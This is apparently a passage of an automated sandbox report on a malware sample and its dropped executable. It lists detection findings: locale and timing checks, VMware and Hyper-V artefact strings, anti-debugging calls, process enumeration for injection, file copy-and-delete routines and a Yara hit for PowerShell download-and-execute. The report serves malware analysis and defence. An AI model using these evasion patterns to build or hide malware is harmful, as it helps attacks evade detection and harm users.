                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Found evasive API chain (may stop execution after checking locale)
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_1-26329
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeWindow / User API: threadDelayed 3961Jump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeWindow / User API: threadDelayed 6032Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeEvaded block: after key decisiongraph_1-27490
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-63723
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeAPI coverage: 5.1 %
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeAPI coverage: 6.5 %
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe TID: 4600Thread sleep count: 3961 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe TID: 4600Thread sleep time: -2816271s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe TID: 4600Thread sleep count: 6032 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe TID: 4600Thread sleep time: -4288752s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_0040E430
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_004138B0
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,1_2_00414570
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00414910
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,1_2_0040ED20
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,1_2_0040BE70
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040DE10
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_004016D0
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0040DA80
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,1_2_00413EA0
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040F6B0
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B0DCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_00B0DCE7
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B0C0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,1_2_00B0C0D7
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B0E077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00B0E077
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B01937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00B01937
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B0F917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00B0F917
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B14107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00B14107
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B0E697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_00B0E697
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B0EF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,1_2_00B0EF87
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B147D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_00B147D7
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B13B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_00B13B17
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B14B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00B14B77
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00401160 GetSystemInfo,ExitProcess,1_2_00401160
                    Source: Amcache.hve.7.drBinary or memory string: VMware
                    Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
                    Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
                    Source: TP77MvSzt2.exe, 00000000.00000002.4211079522.0000000002E09000.00000004.00000020.00020000.00000000.sdmp, TP77MvSzt2.exe, 00000000.00000003.4081243574.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, 9B3F.tmp.exe, 00000001.00000002.2966895028.0000000000903000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                    Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: TP77MvSzt2.exe, 00000000.00000002.4211126136.0000000002E37000.00000004.00000020.00020000.00000000.sdmp, TP77MvSzt2.exe, 00000000.00000003.4081032702.0000000002E37000.00000004.00000020.00020000.00000000.sdmp, 9B3F.tmp.exe, 00000001.00000002.2966895028.0000000000954000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: 9B3F.tmp.exe, 00000001.00000002.2966895028.0000000000903000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware={
                    Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.7.drBinary or memory string: vmci.sys
                    Source: Amcache.hve.7.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                    Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.7.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: 9B3F.tmp.exe, 00000001.00000002.2966895028.0000000000903000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                    Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeAPI call chain: ExitProcess graph end nodegraph_1-26314
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeAPI call chain: ExitProcess graph end nodegraph_1-26317
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeAPI call chain: ExitProcess graph end nodegraph_1-26335
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeAPI call chain: ExitProcess graph end nodegraph_1-26327
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeAPI call chain: ExitProcess graph end nodegraph_1-26200
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeAPI call chain: ExitProcess graph end nodegraph_1-26156
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeAPI call chain: ExitProcess graph end nodegraph_1-26357
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0042A3F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3F3
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_004045C0 VirtualProtect ?,00000004,00000100,000000001_2_004045C0
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0041EC7E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC7E
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0042FE7F mov eax, dword ptr fs:[00000030h]0_2_0042FE7F
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_02DA9F83 push dword ptr fs:[00000030h]0_2_02DA9F83
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_048600E6 mov eax, dword ptr fs:[00000030h]0_2_048600E6
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_04830D90 mov eax, dword ptr fs:[00000030h]0_2_04830D90
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0483092B mov eax, dword ptr fs:[00000030h]0_2_0483092B
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00419750 mov eax, dword ptr fs:[00000030h]1_2_00419750
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_008D9823 push dword ptr fs:[00000030h]1_2_008D9823
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B199B7 mov eax, dword ptr fs:[00000030h]1_2_00B199B7
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B00D90 mov eax, dword ptr fs:[00000030h]1_2_00B00D90
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B0092B mov eax, dword ptr fs:[00000030h]1_2_00B0092B
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0043BBE1 GetProcessHeap,0_2_0043BBE1
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0042A3F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3F3
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_004104F3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004104F3
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_00410686 SetUnhandledExceptionFilter,0_2_00410686
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0040F936 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040F936
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0485A65A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0485A65A
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0484075A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0484075A
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_048408ED SetUnhandledExceptionFilter,0_2_048408ED
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0483FB9D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0483FB9D
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0041AD48
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_0041CEEA SetUnhandledExceptionFilter,1_2_0041CEEA
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0041B33A
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B1B5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00B1B5A1
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B1D151 SetUnhandledExceptionFilter,1_2_00B1D151
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B1AFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00B1AFAF
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeMemory protected: page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell download and execute
                    Source: Yara matchFile source: Process Memory Space: 9B3F.tmp.exe PID: 5440, type: MEMORYSTR
                    Searches for specific processes (likely to inject)
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,1_2_00419600
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B19867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,1_2_00B19867
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeProcess created: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe "C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0041079B cpuid 0_2_0041079B
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0043B02A
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: GetLocaleInfoW,0_2_004351E0
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: EnumSystemLocalesW,0_2_0043B2ED
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: EnumSystemLocalesW,0_2_0043B2A2
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: EnumSystemLocalesW,0_2_0043B388
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B415
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: GetLocaleInfoW,0_2_0043B665
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0043B78E
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: GetLocaleInfoW,0_2_0043B895
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B962
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: EnumSystemLocalesW,0_2_00434DED
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: GetLocaleInfoW,0_2_04865447
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: EnumSystemLocalesW,0_2_0486B5EF
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: EnumSystemLocalesW,0_2_0486B509
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: EnumSystemLocalesW,0_2_0486B554
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: EnumSystemLocalesW,0_2_04865054
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0486B291
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: GetLocaleInfoW,0_2_0486B8CC
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0486B9F5
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: GetLocaleInfoW,0_2_0486BAFC
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0486BBC9
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_00417B90
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_00B17DF7
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_004103ED GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004103ED
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,1_2_00417850
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,1_2_00417A30
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0041640A GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,0_2_0041640A
